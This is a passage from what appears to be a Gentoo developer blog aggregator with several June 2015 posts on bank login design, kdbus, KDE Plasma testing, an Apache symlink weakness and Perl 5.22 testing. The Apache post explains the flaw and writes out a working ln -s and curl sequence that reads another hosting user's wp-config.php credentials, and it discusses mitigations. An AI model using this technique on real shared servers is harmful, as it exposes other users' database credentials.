My first bank, AIB, used a five-digit PIN, and then selected three digits out of it when I logged in, which is not really too difficult to memorize. On the other hand, in their mobile app they decided that the right way to enter the numbers is by using drop-down boxes (sigh). My current bank, Ulster Bank/RBS, uses a four-digit PIN plus a variable-length password, which I generated through LastPass as 20 characters, before realizing how bad that is: it means I now get asked for three random digits out of the four... and three random characters out of the 20.

Let that sink in a moment: they'll ask me for the second, fifth and sixteenth character of a twenty characters randomly generated password. So no auto-fill, no copy-paste, no password management software assisted login. Of course most people here would just not bother and go with a simple password they can remember. Probably made of multiple words of the same length (four letters? five?) so that it becomes easy to count which one is the first character of the fourth word (sixteenth character of the password.) Is it any more secure?

I think I'll write a separate blog post about banks apps and website security mis-practices because it's going to be a long topic and one I want to write down properly so I can forward it to my bank contacts, even though it won't help with anything.

Once again, my opinion is that any time you make security a complicated feature, you're actually worsening the practical security, even if your ideas are supposed to improve the theoretical one. And that includes insisting on the perfect solution for password storage.

June 26, 2015
Mike Pagano a.k.a. mpagano (homepage, bugs)
kdbus in gentoo-sources (June 26, 2015, 23:35 UTC)


Keeping with the theme of 'Gentoo is about choice', I’ve added the ability for users to include kdbus in their gentoo-sources kernel.  I wanted an easy way for Gentoo users to test the patchset while keeping the default of not having it at all.

In order to include the patchset on your gentoo-sources you’ll need the following:

1. A kernel version >= 4.1.0-r1

2. the ‘experimental’ use flag

3. the ‘kdbus’ use flag
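For example, the two USE flags could be set per-package like this (a sketch assuming the standard Portage layout; the file name is arbitrary):

root # echo "sys-kernel/gentoo-sources experimental kdbus" >> /etc/portage/package.use/kernel

Then re-emerge gentoo-sources to get the patched sources.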

I am not a systemd user, but from the ebuild it looks like if you build systemd with the ‘kdbus’ use flag it will use it.

Please send all kdbus bugs upstream by emailing the developers and including in the CC .

Read as much as you can about kdbus before you decide to build it into your kernel.  There have been security concerns mentioned (warranted or not), so following the upstream patch review at would probably be prudent.

When a new version is released, wait a week before opening a bug.  Unless I am on vacation, I will most likely have it included before the week is out. Thanks!

NOTE: This is not some kind of Gentoo endorsement of kdbus.  Nor is it a Mike Pagano endorsement of kdbus.  This is no different than some of the other optional and experimental patches we carry.  I do all the genpatches work, which includes the patches, the ebuilds and the bugs; since I don’t mind the extra work of keeping this up to date, I can’t see any reason not to include it as an option.



June 25, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
KDE Plasma 5.3.1 testing (June 25, 2015, 23:15 UTC)

After several months of packaging in the kde overlay and almost a month in tree, we have lifted the mask for KDE Plasma 5.3.1 today. If you want to test it out, here is some info on how to get it.

For easy transition we provide two new profiles, one for OpenRC and the other for systemd.

root # eselect profile list
[8] default/linux/amd64/13.0/desktop/plasma
[9] default/linux/amd64/13.0/desktop/plasma/systemd

The following example activates the Plasma systemd profile:

root # eselect profile set 9

On stable systems you need to unmask the qt5 use flag:

root # echo "-qt5" >> /etc/portage/profile/use.stable.mask

Any packages affected by the profile change need to be rebuilt:

root # emerge -avuND @world

For stable users, you also need to keyword the required packages. You can let portage handle it with the autounmask feature, or just grep the keyword files for KDE Frameworks 5.11 and KDE Plasma 5.3.1 from the kde overlay.
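As a sketch, a package.accept_keywords entry has this shape (the complete atom list needs to be taken from the overlay's keyword files; the file name is arbitrary):

root # echo "kde-plasma/plasma-meta ~amd64" >> /etc/portage/package.accept_keywords/plasma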

Now just install it (this is full Plasma 5, the basic desktop would be kde-plasma/plasma-desktop):

root # emerge -av kde-plasma/plasma-meta

KDM is not supported for Plasma 5 anymore, so if you have installed it kill it with fire. Possible and tested login managers are SDDM and LightDM.

For detailed instructions read the full upgrade guide. Package bugs can be filed to and about the software to

Have fun,
the Gentoo KDE Team

June 23, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

tl;dr Most servers running a multi-user webhosting setup with Apache HTTPD probably have a security problem. Unless you're using Grsecurity there is no easy fix.

I am part of a small webhosting business that I have been running as a side project for quite a while. We offer customers user accounts on our servers running Gentoo Linux, and webspace with the typical Apache/PHP/MySQL combination. We recently became aware of a security problem involving symlinks. I wanted to share this because I was appalled by the fact that there was no obvious solution.

Apache has an option FollowSymLinks which basically does what it says. If a symlink in a webroot is accessed the webserver will follow it. In a multi-user setup this is a security problem. Here's why: If I know that another user on the same system is running a typical web application - let's say Wordpress - I can create a symlink to his config file (for Wordpress that's wp-config.php). I can't see this file with my own user account. But the webserver can see it, so I can access it with the browser over my own webpage. As I'm usually allowed to disable PHP I'm able to prevent the server from interpreting the file, so I can read the other user's database credentials. The webserver needs to be able to see all files, therefore this works. While PHP and CGI scripts usually run with user's rights (at least if the server is properly configured) the files are still read by the webserver. For this to work I need to guess the path and name of the file I want to read, but that's often trivial. In our case we have default paths in the form /home/[username]/websites/[hostname]/htdocs where webpages are located.
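With default paths like the ones above, the attack is as simple as (usernames and hostnames here are placeholders for illustration):

user $ ln -s /home/victim/websites/victim.example/htdocs/wp-config.php /home/attacker/websites/attacker.example/htdocs/peek
user $ curl http://attacker.example/peek

With PHP interpretation disabled for the attacker's own webspace, the webserver serves the target file's raw contents.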

So the obvious solution one might think about is to disable the FollowSymLinks option and forbid users to set it themselves. However symlinks in web applications are pretty common and many will break if you do that. It's not feasible for a common webhosting server.

Apache supports another option called SymLinksIfOwnerMatch. It's also pretty self-explanatory: the server will only follow symlinks if they belong to the same user. That sounds like it solves our problem. However there are two catches: first of all, the Apache documentation itself says that "this option should not be considered a security restriction". It is still vulnerable to race conditions.
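For illustration, the directive would be set along these lines (the Directory path is a placeholder for this sketch):

<Directory "/home">
    Options -FollowSymLinks +SymLinksIfOwnerMatch
</Directory>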

But even leaving the race condition aside, it doesn't really work. Web applications using symlinks will usually try to set FollowSymLinks in their .htaccess file. An example is Drupal, which by default ships with such an .htaccess file. If you forbid users to set FollowSymLinks, the option won't just be ignored; the whole webpage won't run and will simply return an error 500. What you could do is change the FollowSymLinks option in the .htaccess manually to SymlinksIfOwnerMatch. While this may be feasible in some cases, if you consider that you have a lot of users, you don't want to explain to all of them that in case they want to install some common web application they have to manually edit some file they don't understand. (There's a bug report for Drupal asking to change FollowSymLinks to SymlinksIfOwnerMatch, but it's been ignored for several years.)

So using SymLinksIfOwnerMatch is neither secure nor really feasible. The documentation for Cpanel discusses several possible solutions. The recommended solutions require proprietary modules. None of the proposed fixes work with a plain Apache setup, which I think is a pretty dismal situation. The most common web server has a severe security weakness in a very common situation and no usable solution for it.

The one solution that we chose is a feature of Grsecurity. Grsecurity is a Linux kernel patch that greatly enhances security and we've been very happy with it in the past. There are a lot of reasons to use this patch, I'm often impressed that local root exploits very often don't work on a Grsecurity system.

Grsecurity has an option like SymlinksIfOwnerMatch (CONFIG_GRKERNSEC_SYMLINKOWN) that operates on the kernel level. You can define a certain user group (which in our case is the "apache" group) for which this option will be enabled. For us this was the best solution, as it required very little change.

I haven't checked this, but I'm pretty sure that we were not alone with this problem. I'd guess that a lot of shared web hosting companies are vulnerable to this problem.

Here's the German blog post on our webpage and here's the original blogpost from an administrator at Uberspace (also German) which made us aware of this issue.

June 21, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Perl 5.22 testers needed! (June 21, 2015, 08:14 UTC)

Gentoo users rejoice, for a few days already we have Perl 5.22.0 packaged in the main tree. Since we don't know yet how much stuff will break because of the update, it is masked for now. Which means, we need daring testers (preferably running ~arch systems, stable is also fine but may need more work on your part to get things running) who unmask the new Perl, upgrade, and file bugs if needed!!!
Here's what you need in /etc/portage/package.unmask (and possibly package.accept_keywords) to get started (download); please always use the full block, since partial unmasking will lead to chaos. We're looking forward to your feedback!
# Perl 5.22.0 mask / unmask block

# end of the Perl 5.22.0 mask / unmask block
After the update, first run
emerge --depclean --ask
and afterwards
perl-cleaner --all
perl-cleaner should not need to do anything, ideally. If you have depcleaned first and it still wants to rebuild something, that's a bug. Please file a bug report for the package that is getting rebuilt (but check our wiki page on known Perl 5.22 issues first to avoid duplicates).